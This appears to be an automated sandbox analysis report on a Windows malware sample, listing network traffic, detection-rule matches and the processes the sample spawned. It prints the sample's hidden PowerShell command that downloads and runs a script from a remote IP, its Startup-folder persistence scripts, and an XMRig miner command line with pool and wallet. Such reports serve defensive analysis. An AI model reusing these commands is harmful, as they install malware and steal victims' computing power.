              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49871 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49892 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49915 version: TLS 1.2

              System Summary

              barindex
              Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000009.00000002.2566809285.0000000057280000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000000.1906536489.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000002.2562842128.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_00000001400138E50_2_00000001400138E5
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_00000001400154F00_2_00000001400154F0
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_00000001400151600_2_0000000140015160
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_00000001400151700_2_0000000140015170
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_00000001400131750_2_0000000140013175
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_00000001400102100_2_0000000140010210
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_00000001400162100_2_0000000140016210
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_000000014000EA480_2_000000014000EA48
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_000000014001366E0_2_000000014001366E
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_000000014000B7580_2_000000014000B758
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_0000000140012FDD0_2_0000000140012FDD
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8120 -s 7208
              Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000009.00000002.2566809285.0000000057280000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000000.1906536489.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000002.2562842128.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.mine.winEXE@41/42@8/9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1Jump to behavior
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8120
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6592
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile created: C:\Users\user\AppData\Local\Temp\FB99.tmpJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs"
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 2568
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 2568
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: yjYJ8QncaF.exeVirustotal: Detection: 66%
              Source: yjYJ8QncaF.exeReversingLabs: Detection: 60%
              Source: unknownProcess created: C:\Users\user\Desktop\yjYJ8QncaF.exe "C:\Users\user\Desktop\yjYJ8QncaF.exe"
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 30 /nobreak
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\notepad.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"
              Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"
              Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8120 -s 7208
              Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6592 -s 7472
              Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\notepad.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 30 /nobreakJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP"
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: appresolver.dllJump to behavior
